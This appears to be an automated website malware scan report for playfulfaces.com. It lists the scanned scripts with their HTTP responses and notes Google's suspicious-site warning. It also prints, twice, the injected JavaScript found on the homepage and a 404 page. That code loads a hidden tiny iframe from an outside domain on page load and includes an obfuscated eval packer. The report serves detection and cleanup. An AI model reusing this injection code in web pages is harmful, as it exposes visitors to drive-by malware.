Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=playfulfaces.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.playfulfaces.com/ | HTTP/1.1 301 Moved Permanently Date: Thu, 08 Jan 2015 19:47:40 GMT Location: http://playfulfaces.com/ Server: Microsoft-IIS/7.0 Content-Length: 147 Content-Type: text/html; charset=UTF-8 Set-Cookie: wfvt_-10212062=54aededc46764; expires=Thu, 08-Jan-2015 20:17:40 GMT; path=/; httponly X-Pingback: http://playfulfaces.com/xmlrpc.php X-Powered-By: ASP.NET | clean |
http://playfulfaces.com/ | 200 OK Content-Length: 46917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://playfulfaces.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js | 200 OK Content-Length: 185442 Content-Type: text/javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/jquery.cycle.all.min.js | 200 OK Content-Length: 27906 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/jquery.easing.1.3.js | 200 OK Content-Length: 8268 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/superfish.js | 200 OK Content-Length: 3820 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/scrollTo.js | 200 OK Content-Length: 2262 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/serialScroll.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://playfulfaces.com/test404page.js | 404 Not Found Content-Length: 37273 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://playfulfaces.com/wp-content/themes/DeepFocus/js/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 2736 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/jquery.flexslider-min.js?ver=1.0 | 200 OK Content-Length: 16845 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/js/et_flexslider.js?ver=1.0 | 200 OK Content-Length: 3424 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4 | 200 OK Content-Length: 6755 Content-Type: application/x-javascript | clean |
http://playfulfaces.com/wp-content/themes/DeepFocus/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4 | 200 OK Content-Length: 15690 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: playfulfaces.com
Result:
HTTP/1.1 200 OK
Date: Thu, 08 Jan 2015 19:47:41 GMT
Server: Microsoft-IIS/7.0
Content-Length: 46917
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_-10212062=54aededd09245; expires=Thu, 08-Jan-2015 20:17:41 GMT; path=/; httponly
X-Pingback: http://playfulfaces.com/xmlrpc.php
X-Powered-By: ASP.NET
...46917 bytes of data.
GET / HTTP/1.1
Host: playfulfaces.com
Result:
HTTP/1.1 200 OK
Date: Thu, 08 Jan 2015 19:47:41 GMT
Server: Microsoft-IIS/7.0
Content-Length: 46917
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_-10212062=54aededd09245; expires=Thu, 08-Jan-2015 20:17:41 GMT; path=/; httponly
X-Pingback: http://playfulfaces.com/xmlrpc.php
X-Powered-By: ASP.NET
...46917 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: playfulfaces.com
Referer: http://www.google.com/search?q=playfulfaces.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: playfulfaces.com
Referer: http://www.google.com/search?q=playfulfaces.com
Result:
The result is similar to the first query. There are no suspicious redirects found.